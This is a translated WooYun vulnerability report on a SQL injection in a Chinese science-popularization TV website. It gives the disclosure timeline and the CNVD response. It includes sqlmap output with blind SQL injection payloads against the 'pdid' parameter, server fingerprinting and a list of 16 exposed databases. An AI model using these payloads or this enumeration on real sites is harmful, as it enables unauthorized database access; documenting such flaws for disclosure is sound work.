Vulnerability summary

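Bug ID: wooyun-2015-0149435

Vulnerability title: SQL injection in China Network Science Popularization TV (中国网络科普电视台), 16 databases

Affected vendor: China Network Science Popularization TV (中国网络科普电视台)

Reported by: 路人甲

Submitted: 2015-10-27 16:58

Fixed: 2015-12-14 18:00

Disclosed: 2015-12-14 18:00

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 11

Vulnerability status: Handed over to a third-party partner organization (cncert, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org. If you have questions or need help, contact [email protected]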


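Vulnerability details

Disclosure status:

2015-10-27: Details reported to the vendor; awaiting vendor handling
2015-10-30: Vendor confirmed; details disclosed to the vendor only
2015-11-09: Details disclosed to core white hats and experts in related fields
2015-11-19: Details disclosed to regular white hats
2015-11-29: Details disclosed to intern white hats
2015-12-14: Details disclosed to the public

Brief description:

So does this site belong to the Henan/Hebei Provincial Association for Science and Technology information center, or what?

Detailed description: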

http://**.**.**.**/pdnr.aspx?pdid=294 (GET)

<code>sqlmap identified the following injection points with a total of 62 HTTP(s) requests:
---
Parameter: pdid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pdid=294 AND 3529=3529
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: pdid=294 AND 4025=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pdid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pdid=294 AND 3529=3529
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: pdid=294 AND 4025=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
available databases [16]:
[*] ASPNETDB
[*] CPST_MOVIE
[*] HAST
[*] hbkxoa
[*] hbqd
[*] master
[*] model
[*] msdb
[*] nckp
[*] news
[*] Northwind
[*] psschool
[*] pubs
[*] QMSZ
[*] tempdb
[*] XYIR

</code>

Proof of vulnerability:



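Remediation:

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-10-30 17:58

Vendor reply:

CNVD confirmed and reproduced the situation described. It has been passed to CNCERT for dispatch to the Hebei sub-center, which will follow up and coordinate handling with the organization that manages the website.

Latest status:

None yet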